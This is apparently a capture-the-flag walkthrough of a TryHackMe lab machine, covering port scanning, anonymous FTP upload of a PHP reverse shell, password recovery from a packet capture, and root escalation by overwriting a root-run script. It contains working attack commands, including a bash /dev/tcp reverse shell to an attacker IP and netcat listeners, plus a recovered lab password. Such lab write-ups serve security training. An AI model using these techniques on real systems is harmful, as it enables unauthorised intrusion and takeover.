Room Covers:

  • Discovery
  • Exploitation
  • Privilege Escalation (horizontal + vertical)

Target Details

  • IP: 10.10.115.38

Service and Content Discovery

  • Scan Machine with Nmap

    nmap -sC -sV -Pn -oN nmap.txt 10.10.115.38
    
    Nmap scan report for 10.10.115.38
    Host is up (0.38s latency).
    Not shown: 996 closed tcp ports (conn-refused)
    PORT     STATE    SERVICE VERSION
    21/tcp   open     ftp     vsftpd 3.0.3
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    | drwxrwxrwx    2 65534    65534        4096 Nov 12  2020 ftp [NSE: writeable]
    | -rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
    |_-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
    | ftp-syst:
    |   STAT:
    | FTP server status:
    |      Connected to 10.x.x.x
    |      Logged in as ftp
    |      TYPE: ASCII
    |      No session bandwidth limit
    |      Session timeout in seconds is 300
    |      Control connection is plain text
    |      Data connections will be plain text
    |      At session startup, client count was 2
    |      vsFTPd 3.0.3 - secure, fast, stable
    |_End of status
    22/tcp   open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA)
    |   256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA)
    |_  256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519)
    80/tcp   open     http    Apache httpd 2.4.18 ((Ubuntu))
    |_http-title: Maintenance
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    1131/tcp filtered caspssl
    Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    # Nmap done at Sat Jul  2 13:34:28 2022 -- 1 IP address (1 host up) scanned in 64.99 seconds
    
    

    We can login anonymously on FTP and we can write data anonymously in ftp directory

  • Services Discovered

    Service Port Version
    FTP 21 vsftpd 3.0.3
    SSH 22 OpenSSH 7.2p2
    HTTP 80 Apache httpd 2.4.18
  • Visiting HTTP website doesn’t provide much information

  • Finding directories using gobuster

    gobuster dir -u http://10.10.115.38 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -t 30 --no-error -o web-dirs.txt
    
  • Directories Found

    Directory Link
    files /files
  • On visitng /files we get few files along with notice directory

Accessing FTP

  • Login anonymously

    ftp 10.10.115.38
    
    Connected to 10.10.115.38.
    220 (vsFTPd 3.0.3)
    Name (10.10.115.38:attacker): anonymous
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp>
    

    Logged in successfully

  • list files

    ftp> ls
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    drwxrwxrwx    2 65534    65534        4096 Jul 02 09:09 ftp
    -rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
    -rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
    

    files are of web directory /files

Get Reverse Shell from Target Machine

  • Download php reverse shell

    wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
    
  • In reverse shell, change IP to TryHackMe VPN IP. default port is 1234

  • Start Netcat listener

    nc -nlvp 1234
    
  • Upload via FTP anonymously

    ftp> cd ftp
    250 Directory successfully changed.
    ftp> put php-reverse-shell.php
    local: php-reverse-shell.php remote: php-reverse-shell.php
    200 PORT command successful. Consider using PASV.
    150 Ok to send data.
    226 Transfer complete.
    5596 bytes sent in 0.00 secs (53.3676 MB/s)
    ftp>s
    
  • From browser visit /files/ftp/ directory and click on reverse shell file to get reverse shell on attacker’s terminal

    # nc -nlvp 1234
    listening on [any] 1234 ...
    connect to [10.x.x.x] from (UNKNOWN) [10.10.115.38] 51642
    Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
     08:15:07 up 13 min,  0 users,  load average: 0.07, 0.51, 0.44
    USER     TTY      FROM             [email protected]   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $
    

Search for First Flag

  • Find files

    $ whoami
    www-data
    $ ls
    bin
    boot
    dev
    etc
    home
    incidents
    initrd.img
    initrd.img.old
    lib
    lib64
    lost+found
    media
    mnt
    opt
    proc
    recipe.txt
    root
    run
    sbin
    snap
    srv
    sys
    tmp
    usr
    vagrant
    var
    vmlinuz
    vmlinuz.old
    
  • Read recipe.txt file

    $ cat recipe.txt
    Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was xxxx.
    
  • We need to escalate privileges to read files

Privilege Escalation

  • Finding files with sticky bits

    $ find / -perm -u=s -type f 2>/dev/null
    /bin/mount
    /bin/fusermount
    /bin/umount
    /bin/ping6
    /bin/su
    /bin/ping
    /usr/bin/passwd
    /usr/bin/pkexec
    /usr/bin/at
    /usr/bin/sudo
    /usr/bin/newuidmap
    /usr/bin/chfn
    /usr/bin/newgrp
    /usr/bin/chsh
    /usr/bin/newgidmap
    /usr/bin/gpasswd
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
    /usr/lib/snapd/snap-confine
    /usr/lib/openssh/ssh-keysign
    /usr/lib/policykit-1/polkit-agent-helper-1
    

    Couldn’t find something important

  • Checking for Python to get shell with tty

    $ python --version
    Python 2.7.12
    
  • Spawn TTY terminal to use sudo/su

    python -c 'import pty; pty.spawn("/bin/bash")'
    [email protected]
    
  • from /incidents directory found a pcap file

    [email protected]:/incidents$ ls -l
    total 32
    -rwxr-xr-x 1 www-data www-data 31224 Nov 12  2020 suspicious.pcapng
    
  • To analzye this file in WireShark, we need to first download the file, let’s copy this file in ftp directory, then we can download it from web server

    [email protected]:/incidents$ cp suspicious.pcapng /var/www/html/files/ftp
    
  • Download the file from http://10.10.115.38/files/ftp/suspicious.pcapng

  • Load the file in WireShark, right click on TCP packet number around 200 and choose follow -> TCP Stream, a list of commands will pop up in a new window, from where we can find the password

  • From pcap file: use follow lennie password c4ntg3txxxxxxxxxxx

  • Now, we can log into lennie’s account with the password

    su lennie
    Password:
    [email protected]:~$
    

    We’ve successfully escalated privileges horiztontally

Get User Flag

Escalating Privileges Vertically

  • finding executables with sticky bits

    [email protected]:~$ find / -perm -u=s -type f 2>/dev/null
    /bin/mount
    /bin/fusermount
    /bin/umount
    /bin/ping6
    /bin/su
    /bin/ping
    /usr/bin/passwd
    /usr/bin/pkexec
    /usr/bin/at
    /usr/bin/sudo
    /usr/bin/newuidmap
    /usr/bin/chfn
    /usr/bin/newgrp
    /usr/bin/chsh
    /usr/bin/newgidmap
    /usr/bin/gpasswd
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
    /usr/lib/snapd/snap-confine
    /usr/lib/openssh/ssh-keysign
    /usr/lib/policykit-1/polkit-agent-helper-1
    

    let’s try sudo

  • get sudo executables list

    [email protected]:~$ sudo -l
    [sudo] password for lennie: c4ntg3t3n0ughsp1c3
    Sorry, user lennie may not run sudo on startup.
    

    We cannot use sudo command

  • There was scripts folder in the home directory

    [email protected]:~$ ls -l scripts
    total 8
    -rwxr-xr-x 1 root root 77 Nov 12  2020 planner.sh
    -rw-r--r-- 1 root root  1 Jul  2 10:42 startup_list.txt
    

    planner.sh script belongs to root user

  • Read planner.sh script

    [email protected]:~$ cat scripts/planner.sh
    #!/bin/bash
    echo $LIST > /home/lennie/scripts/startup_list.txt
    /etc/print.sh
    

    scripts calls another script /etc/print.sh with root privileges

  • Let’s analyze print.sh script

    [email protected]:~$ ls -l /etc/print.sh
    -rwx------ 1 lennie lennie 60 Jul  2 10:11 /etc/print.sh
    

    This script belongs to lennie, hence we can write it and create a reverse shell with root access

  • Overwrite file contents

    echo "bash -c 'exec sudo bash -i &>/dev/tcp/10.x.x.x/9999 <&1'" > /etc/print.sh
    
  • Start netcat listener on attacker’s machine on port 9999

    nc -nlvp 9999
    listening on [any] 9999 ...
    
  • Execute planner.sh script

    bash /home/lennie/scripts/planner.sh
    
  • Get Reverse Shell

    nc -nlvp 9999
    listening on [any] 9999 ...
    connect to [10.x.x.x] from (UNKNOWN) [10.10.115.38] 50290
    sudo: unable to resolve host startup
    bash: cannot set terminal process group (5564): Inappropriate ioctl for device
    bash: no job control in this shell
    [email protected]:~#
    

    We’ve successfully got root privileges machine

Get Root Flag